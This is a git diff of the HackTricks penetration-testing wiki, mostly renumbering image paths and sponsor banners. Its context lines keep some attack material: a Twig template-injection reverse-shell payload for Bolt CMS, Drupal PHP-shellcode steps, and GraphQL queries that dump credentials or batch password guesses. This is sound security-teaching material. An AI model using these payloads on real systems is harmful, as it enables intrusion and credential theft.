 Nmap: nmap --script smtp-enum-users <IP>
 ```
 
-<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -625,7 +625,7 @@ Entry_8:
 
 ```
 
-<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-smtp/smtp-commands.md b/network-services-pentesting/pentesting-smtp/smtp-commands.md
index 353494c96..2a8dd7bcb 100644
--- a/network-services-pentesting/pentesting-smtp/smtp-commands.md
+++ b/network-services-pentesting/pentesting-smtp/smtp-commands.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -61,7 +61,7 @@ It’s a client’s request for some information that can be useful for the a su
 **QUIT**\
 It terminates the SMTP conversation.
 
-<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-smtp/smtp-smuggling.md b/network-services-pentesting/pentesting-smtp/smtp-smuggling.md
index 805a0d682..b66196007 100644
--- a/network-services-pentesting/pentesting-smtp/smtp-smuggling.md
+++ b/network-services-pentesting/pentesting-smtp/smtp-smuggling.md
@@ -22,7 +22,7 @@ This type of vulnerability was [**originally discovered in this post**](https://
 
 This is because in the SMTP protocol, the **data of the message** to be sent in the email is controlled by a user (attacker) which could send specially crafted data abusing differences in parsers that will smuggle extra emails in the receptor. Take a look to this illustrated example from the original post:
 
-<figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption><p><a href="https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png">https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png</a></p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (8).png" alt=""><figcaption><p><a href="https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png">https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png</a></p></figcaption></figure>
 
 ### How
 
diff --git a/network-services-pentesting/pentesting-snmp/README.md b/network-services-pentesting/pentesting-snmp/README.md
index 39f244a47..cb4e39f7d 100644
--- a/network-services-pentesting/pentesting-snmp/README.md
+++ b/network-services-pentesting/pentesting-snmp/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -260,7 +260,7 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can
 * snmpd.conf
 * snmp-config.xml
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/network-services-pentesting/pentesting-snmp/cisco-snmp.md
index 9b4ed62cc..8161c6562 100644
--- a/network-services-pentesting/pentesting-snmp/cisco-snmp.md
+++ b/network-services-pentesting/pentesting-snmp/cisco-snmp.md
@@ -12,7 +12,7 @@
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -53,7 +53,7 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
 
 * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/network-services-pentesting/pentesting-telnet.md b/network-services-pentesting/pentesting-telnet.md
index b9e0fcf8a..75eaa580a 100644
--- a/network-services-pentesting/pentesting-telnet.md
+++ b/network-services-pentesting/pentesting-telnet.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -94,7 +94,7 @@ Entry_4:
   
 ```
 
-<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
index 6ff8b9e18..8e4f6f8a6 100644
--- a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
+++ b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Signaling Protocols
 
@@ -122,7 +122,7 @@ These protocols play essential roles in **delivering and securing real-time mult
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -141,7 +141,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md b/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md
index 0f615bffc..5138ea094 100644
--- a/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md
+++ b/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md
@@ -248,7 +248,7 @@ After the registrar server verifies the provided credentials, **it sends a "200
 
 ### Call Example
 
-<figure><img src="../../../.gitbook/assets/image (1098).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1101).png" alt=""><figcaption></figcaption></figure>
 
 {% hint style="info" %}
 It's not mentioned, but User B needs to have sent a **REGISTER message to Proxy 2** before he is able to receive calls.
diff --git a/network-services-pentesting/pentesting-web/403-and-401-bypasses.md b/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
index bafbc0a3e..ed1608220 100644
--- a/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
+++ b/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -134,7 +134,7 @@ guest    guest
 * [Burp Extension - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122)
 * [Forbidden Buster](https://github.com/Sn1r/Forbidden-Buster)
 
-<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md
index b468644bd..b83a7f970 100644
--- a/network-services-pentesting/pentesting-web/README.md
+++ b/network-services-pentesting/pentesting-web/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -365,7 +365,7 @@ Find more info about web vulns in:
 
 You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities.
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/network-services-pentesting/pentesting-web/bolt-cms.md b/network-services-pentesting/pentesting-web/bolt-cms.md
index a86246c7a..1a0bd9a98 100644
--- a/network-services-pentesting/pentesting-web/bolt-cms.md
+++ b/network-services-pentesting/pentesting-web/bolt-cms.md
@@ -21,7 +21,7 @@ After login as admin (go to /bot lo access the login prompt), you can get RCE in
 * Select `Configuration` -> `View Configuration` -> `Main Configuration` or go the the URL path `/bolt/file-edit/config?file=/bolt/config.yaml`
   * Check the value of theme
 
-<figure><img src="../../.gitbook/assets/image (768).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (771).png" alt=""><figcaption></figcaption></figure>
 
 * Select `File management` -> `View & edit templates`
   * Select the theme base found in the previous (`base-2021` in this case) step and select `index.twig`
@@ -29,7 +29,7 @@ After login as admin (go to /bot lo access the login prompt), you can get RCE in
 * Set your payload in this file via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), like: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
   * And save changes
 
-<figure><img src="../../.gitbook/assets/image (945).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (948).png" alt=""><figcaption></figcaption></figure>
 
 * Clear the cache in `Maintenance` -> `Clear the cache`
 * Access again the page as a regular user, and the payload should be executed
diff --git a/network-services-pentesting/pentesting-web/drupal.md b/network-services-pentesting/pentesting-web/drupal.md
index 2a023b93c..6ff48bb80 100644
--- a/network-services-pentesting/pentesting-web/drupal.md
+++ b/network-services-pentesting/pentesting-web/drupal.md
@@ -14,11 +14,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 ## Discovery
 
 * Check **meta**
@@ -61,23 +60,23 @@ Newer installs of Drupal by default block access to the `CHANGELOG.txt` and `REA
 
 In _/user/register_ just try to create a username and if the name is already taken it will be notified:
 
-![](<../../.gitbook/assets/image (325).png>)
+![](<../../.gitbook/assets/image (328).png>)
 
 #### Request new password
 
 If you request a new password for an existing username:
 
-![](<../../.gitbook/assets/image (900).png>)
+![](<../../.gitbook/assets/image (903).png>)
 
 If you request a new password for a non-existent username:
 
-![](<../../.gitbook/assets/image (304).png>)
+![](<../../.gitbook/assets/image (307).png>)
 
 ### Get number of users
 
 Accessing _/user/\<number>_ you can see the number of existing users, in this case is 2 as _/users/3_ returns a not found error:
 
-![](<../../.gitbook/assets/image (330).png>)
+![](<../../.gitbook/assets/image (333).png>)
 
 ![](<../../.gitbook/assets/image (227) (1) (1) (1).png>)
 
@@ -120,7 +119,7 @@ Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_
 
 Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_
 
-![](<../../.gitbook/assets/image (335).png>)
+![](<../../.gitbook/assets/image (338).png>)
 
 Finally just access the newly created node:
 
@@ -194,11 +193,10 @@ mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from
 
 * [https://academy.hackthebox.com/module/113/section/1209](https://academy.hackthebox.com/module/113/section/1209)
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
index f97098d13..85579420d 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Introduction
 
@@ -52,7 +52,7 @@ Electron has 2 process types:
 * Main Process (has complete access to NodeJS)
 * Renderer Process (should have NodeJS restricted access for security reasons)
 
-![](<../../../.gitbook/assets/image (179).png>)
+![](<../../../.gitbook/assets/image (182).png>)
 
 A **renderer process** will be a browser window loading a file:
 
@@ -147,7 +147,7 @@ If the **nodeIntegration** is set to **on**, a web page's JavaScript can use Nod
 </script>
 ```
 
-<figure><img src="../../../.gitbook/assets/image (1107).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1110).png" alt=""><figcaption></figcaption></figure>
 
 ## RCE: preload
 
@@ -238,9 +238,9 @@ These listeners are **overridden by the desktop application** to implement its o
 
 **Here is a simplified pseudocode:**
 
-![https://miro.medium.com/max/1400/1\*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (258).png>)
+![https://miro.medium.com/max/1400/1\*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (261).png>)
 
-![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>)
+![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (963).png>)
 
 Electron JS security best practices advise against accepting untrusted content with the `openExternal` function, as it could lead to RCE through various protocols. Operating systems support different protocols that might trigger RCE. For detailed examples and further explanation on this topic, one can refer to [this resource](https://positive.security/blog/url-open-rce#windows-10-19042), which includes Windows protocol examples capable of exploiting this vulnerability.
 
@@ -351,7 +351,7 @@ npm start
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
index 9397b47d4..a2fa02c9c 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
@@ -29,17 +29,17 @@ process.on('exit', function (){
 
 {% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %}
 
-![](<../../../.gitbook/assets/image (1067).png>)
+![](<../../../.gitbook/assets/image (1070).png>)
 
 https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- No longer exists
 
 Then it goes here:
 
-![](<../../../.gitbook/assets/image (790).png>)
+![](<../../../.gitbook/assets/image (793).png>)
 
 Where "self" is Node's process object:
 
-![](<../../../.gitbook/assets/image (697).png>)
+![](<../../../.gitbook/assets/image (700).png>)
 
 The process object has a references to "require" function:
 
@@ -64,11 +64,11 @@ Get **require object from prototype pollution**. From [https://www.youtube.com/w
 
 Leak:
 
-<figure><img src="../../../.gitbook/assets/image (276).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (279).png" alt=""><figcaption></figcaption></figure>
 
 Exploit:
 
-<figure><img src="../../../.gitbook/assets/image (86).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (89).png" alt=""><figcaption></figcaption></figure>
 
 <details>
 
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
index 1241e157c..603f0c114 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
@@ -22,7 +22,7 @@ If the preload script exposes an IPC endpoint from the main.js file, the rendere
 
 Example from [https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21](https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21) (you have the full example of how MS Teams was abusing from XSS to RCE in those slides, this is just a very basic example):
 
-<figure><img src="../../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (9).png" alt=""><figcaption></figcaption></figure>
 
 ## Example 1
 
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
index ecc4da8c8..60e4b34d5 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
@@ -20,7 +20,7 @@ Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-o
 
 This code open http(s) links with default browser:
 
-![](<../../../.gitbook/assets/image (765).png>)
+![](<../../../.gitbook/assets/image (768).png>)
 
 Something like `file:///C:/Windows/systemd32/calc.exe` could be used to execute a calc, the `SAFE_PROTOCOLS.indexOf` is preventing it.
 
diff --git a/network-services-pentesting/pentesting-web/flask.md b/network-services-pentesting/pentesting-web/flask.md
index 601bd1237..794ef4b6c 100644
--- a/network-services-pentesting/pentesting-web/flask.md
+++ b/network-services-pentesting/pentesting-web/flask.md
@@ -14,12 +14,12 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (512).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (515).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=flask) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
 
 **Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
 
@@ -118,12 +118,12 @@ app.run(host='0.0.0.0', port=8080)
 
 Could allow to introduce something like "@attacker.com" in order to cause a **SSRF**.
 
-<figure><img src="../../.gitbook/assets/image (512).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (515).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=flask) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
 
 <details>
 
diff --git a/network-services-pentesting/pentesting-web/graphql.md b/network-services-pentesting/pentesting-web/graphql.md
index ef3c8b7d8..0de5e9784 100644
--- a/network-services-pentesting/pentesting-web/graphql.md
+++ b/network-services-pentesting/pentesting-web/graphql.md
@@ -63,7 +63,7 @@ query={__schema{types{name,fields{name}}}}
 
 With this query you will find the name of all the types being used:
 
-![](<../../.gitbook/assets/image (1033).png>)
+![](<../../.gitbook/assets/image (1036).png>)
 
 {% code overflow="wrap" %}
 ```bash
@@ -73,7 +73,7 @@ query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofTy
 
 With this query you can extract all the types, it's fields, and it's arguments (and the type of the args). This will be very useful to know how to query the database.
 
-![](<../../.gitbook/assets/image (947).png>)
+![](<../../.gitbook/assets/image (950).png>)
 
 **Errors**
 
@@ -85,7 +85,7 @@ It's interesting to know if the **errors** are going to be **shown** as they wil
 ?query={thisdefinitelydoesnotexist}
 ```
 
-![](<../../.gitbook/assets/image (413).png>)
+![](<../../.gitbook/assets/image (416).png>)
 
 **Enumerate Database Schema via Introspection**
 
@@ -191,7 +191,7 @@ Inline introspection query:
 
 The last code line is a graphql query that will dump all the meta-information from the graphql (objects names, parameters, types...)
 
-![](<../../.gitbook/assets/image (360).png>)
+![](<../../.gitbook/assets/image (363).png>)
 
 If introspection is enabled you can use [**GraphQL Voyager**](https://github.com/APIs-guru/graphql-voyager) to view in a GUI all the options.
 
@@ -215,7 +215,7 @@ query={flags{name, value}}
 
 Note that in case the **object to query** is a **primitive** **type** like **string** like in the following example
 
-![](<../../.gitbook/assets/image (955).png>)
+![](<../../.gitbook/assets/image (958).png>)
 
 You can just query is with:
 
@@ -226,11 +226,11 @@ query={hiddenFlags}
 In another example where there were 2 objects inside the "_Query_" type object: "_user_" and "_users_".\
 If these objects don't need any argument to search, could **retrieve all the information from them** just **asking** for the data you want. In this example from Internet you could extract the saved usernames and passwords:
 
-![](<../../.gitbook/assets/image (877).png>)
+![](<../../.gitbook/assets/image (880).png>)
 
 However, in this example if you try to do so you get this **error**:
 
-![](<../../.gitbook/assets/image (1039).png>)
+![](<../../.gitbook/assets/image (1042).png>)
 
 Looks like somehow it will search using the "_**uid**_" argument of type _**Int**_.\
 Anyway, we already knew that, in the [Basic Enumeration](graphql.md#basic-enumeration) section a query was purposed that was showing us all the needed information: `query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}`
@@ -240,11 +240,11 @@ If you read the image provided when I run that query you will see that "_**user*
 So, performing some light _**uid**_ bruteforce I found that in _**uid**=**1**_ a username and a password was retrieved:\
 `query={user(uid:1){user,password}}`
 
-![](<../../.gitbook/assets/image (87).png>)
+![](<../../.gitbook/assets/image (90).png>)
 
 Note that I **discovered** that I could ask for the **parameters** "_**user**_" and "_**password**_" because if I try to look for something that doesn't exist (`query={user(uid:1){noExists}}`) I get this error:
 
-![](<../../.gitbook/assets/image (704).png>)
+![](<../../.gitbook/assets/image (707).png>)
 
 And during the **enumeration phase** I discovered that the "_**dbuser**_" object had as fields "_**user**_" and "_**password**_.
 
@@ -386,7 +386,7 @@ Authentication through GraphQL API with **simultaneously sending many queries wi
 
 Below you can find the simplest demonstration of an application authentication request, with **3 different email/passwords pairs at a time**. Obviously it’s possible to send thousands in a single request in the same way:
 
-![](<../../.gitbook/assets/image (1078).png>)
+![](<../../.gitbook/assets/image (1081).png>)
 
